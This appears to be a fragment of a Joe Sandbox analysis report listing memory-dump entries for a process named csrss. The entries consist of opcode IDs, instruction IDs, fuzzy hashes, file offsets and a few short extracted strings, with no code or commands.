                                                      • Instruction ID: b124d02e397c1a7b8d0303321a6513e14cd487888f4127425d5d9bfeb77e7c54
                                                      • Opcode Fuzzy Hash: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction Fuzzy Hash: D7F06D7194E7C44FCB1AEA348868454BFA0EF6721174A41EEC056CF1A7EA6D8885C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction ID: 3fdafac0eca549572a7c9544ab130378ecd1bed7e7640abfe0a55f293b209eef
                                                      • Opcode Fuzzy Hash: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction Fuzzy Hash: 9FE0487144E7D44FCB06EB7484698553FA0EF67615B8A40DEC045CF1B3E66D988AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction ID: a1ead72dabc0c1e0d961b4c791e8f8e33dcaf56f56cd3c594ab1bc0e3267adef
                                                      • Opcode Fuzzy Hash: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction Fuzzy Hash: CDE01A7184E7C44FCB4AEB74886A9943FA0EE6B21578A40EEC045CF1B3E62D8849C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction ID: 529866176ef0b688c76d809301fc431a556a99169a3855fceffe04aa7ab50ff9
                                                      • Opcode Fuzzy Hash: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction Fuzzy Hash: BBE0127184E7D44FCB06EB7488798557FA0EE6725174B41EEC045CF1B3D62D8845C701
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9928631c9f6a249ae11015b69c8b5595aed794c39e79fca57d4a1d7aac640ad8
                                                      • Instruction ID: 06b1e93188f86e0c135f2098256fa1a125513a1917ab1dfc185d2ded79b5ee3a
                                                      • Opcode Fuzzy Hash: 9928631c9f6a249ae11015b69c8b5595aed794c39e79fca57d4a1d7aac640ad8
                                                      • Instruction Fuzzy Hash: 1F416A52E4D9A62EE309B37CA0992FC6B81FF853A5F1844BBD14DC71D3DE1878818698
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03a358588bfd1e6dd2f5bc51744d667e2133e5b99e7e7a37cd118556a837a8cf
                                                      • Instruction ID: 4acf8255f491e5f9505a0ff8bb1317ddb28f86f45e43d54343dd1c5afc705f61
                                                      • Opcode Fuzzy Hash: 03a358588bfd1e6dd2f5bc51744d667e2133e5b99e7e7a37cd118556a837a8cf
                                                      • Instruction Fuzzy Hash: 9721F320B1D9595FE788B62C9449A7977C2FF99351F5400BAE40EC32D7DE28AC818289
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe1206d3ed81d1b5a5f6e37d6a9545a97959241a870341c55d7148242be3b9ac
                                                      • Instruction ID: dfdc91b9ee1e7b09fcda45fbe738a8d89dc66b39d6ab7b2323a3490a79ad55d2
                                                      • Opcode Fuzzy Hash: fe1206d3ed81d1b5a5f6e37d6a9545a97959241a870341c55d7148242be3b9ac
                                                      • Instruction Fuzzy Hash: 8131903190D68A8FDB46EB28C8599A97BF0FF56340F4805FBC009E71A2DB39A845C751
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad36c1f08fd26e5e1104a0608639e393b015a2cdc59c07d35dad339c2ff915ac
                                                      • Instruction ID: 01552d8fddd2b0135b23e515cc38ad364daa7b1b6922fa251f3b870ec48001fb
                                                      • Opcode Fuzzy Hash: ad36c1f08fd26e5e1104a0608639e393b015a2cdc59c07d35dad339c2ff915ac
                                                      • Instruction Fuzzy Hash: 76318631E0C94A8FEB54EA58C495AB973A2FB98354F04467AC01ED72C7CF78AC418785
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95d34435ff7d6af0bc2c430a912ad87c7063ecc15d2ef110d1a727986c5c54b4
                                                      • Instruction ID: 71039aad425769ed0e19939dca2db01dfd8e59a8071d5dfd5e29c62db84100cd
                                                      • Opcode Fuzzy Hash: 95d34435ff7d6af0bc2c430a912ad87c7063ecc15d2ef110d1a727986c5c54b4
                                                      • Instruction Fuzzy Hash: 4821D051E4DD5A3EF658B27C644A6F967C2FF483A1F5844BAE40DC31D3DE28BC804698
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction ID: 46013800c90834bb859a11db80516c945551bd244e4f492b285ca7f6029c2a4c
                                                      • Opcode Fuzzy Hash: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction Fuzzy Hash: 66216021E0C91A4FEAA4FA2884587B822D2FF94390F9446B6D40DF32D3DF78BC408749
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e6f8177d9203ac98609e71a9b848ceb7b675209a8ae8d25e95ccfa57ca7274bb
                                                      • Instruction ID: 9019beb1a0b2ee2db5800796c23ac505697e347d6cb07949201b6d1c08ce48e6
                                                      • Opcode Fuzzy Hash: e6f8177d9203ac98609e71a9b848ceb7b675209a8ae8d25e95ccfa57ca7274bb
                                                      • Instruction Fuzzy Hash: 8F21D331A0D6999FE711FB28C4452EC7FA0FF42360F5545B6C044FB1C2DB3829898755
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e70000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction ID: 67a6eb3ff0139141714dc92bf27de1e7d90bd7c2eb160065a79604a0b3069690
                                                      • Opcode Fuzzy Hash: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction Fuzzy Hash: 4B114F21E1C91A4FFA98FB2884556B87292FF98340F6405B9D40ED72D6DF38AC024784
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 568aae5f4c562acde53c279bae93d09b133feb386604ca98fa70b15f257dc77e
                                                      • Instruction ID: 47885c3a409097ec158d5b6332351776d12aec3b2f11c4dae18d916e4d89da48
                                                      • Opcode Fuzzy Hash: 568aae5f4c562acde53c279bae93d09b133feb386604ca98fa70b15f257dc77e
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 97D01234B549054FC70CBA388C99C747391EB6E216B9540A9D00AD73B5DA6ADC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 11a9089a325351e74b09ddd1052655bbc03aa67a49e6dbc6211aa68b6dca963e
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BED01234B549084FC70CB738D85987473A1EB6A216B9540A9D00AC72B1DAAADC89C741
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e91000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction ID: 307375f2f39e48a3ce7c2fd4ed40096ef78becb920e82222f69354ac1956991e
                                                      • Opcode Fuzzy Hash: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction Fuzzy Hash: 22C08C305118088FC70CFB2CC89DD60B3E0FB2A201F9200A8D40ECB531EB6A9DE8CB81
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b4911254ed6ccf8ddc1f6681f750fc35decf834ec54729328e2f0adad0e8eaa
                                                      • Instruction ID: 1507d3cc8e9d49a6ddfb38906baf4ffed1bc978b45e643fab75c2f326847000e
                                                      • Opcode Fuzzy Hash: 4b4911254ed6ccf8ddc1f6681f750fc35decf834ec54729328e2f0adad0e8eaa
                                                      • Instruction Fuzzy Hash: EDD05E21E2CB594EEB42B370841A2FD52A2BF14350F8804B8D44EB71D3CF7D34005A88
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 3733c24adb4382d9a53a210685dc36ebdcbea8b66b98e3371b2b595405a3d5ea
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 48D0C92AC1D5238FFA72305448241BD0255BBA03B5FA947B2D83D3A1D5AF7DBD41861A
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: df46ae11a4307f9da4f694c293df9133eccd3b9680619939cdf0be34c2d8d1d6
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 79C08C309108088FC908FB28C88480837A0FB09200BC20090E008C7170D229ECE0C740
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d7aba2d6da692230352c6606e60930ef551249b58ed7a89083c9f9ac598423b
                                                      • Instruction ID: 7cd50fd0b9f34b2f1da173e9dc5147b5e31b38752dafe721a8d374b0ae82cb85
                                                      • Opcode Fuzzy Hash: 1d7aba2d6da692230352c6606e60930ef551249b58ed7a89083c9f9ac598423b
                                                      • Instruction Fuzzy Hash: 06C08C06E0EC169AF25A220480221BE44029F80784F8400B5E01E863CADF0C2E0142CA
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000002D.00000002.2364629768.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_45_2_7ff848e60000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD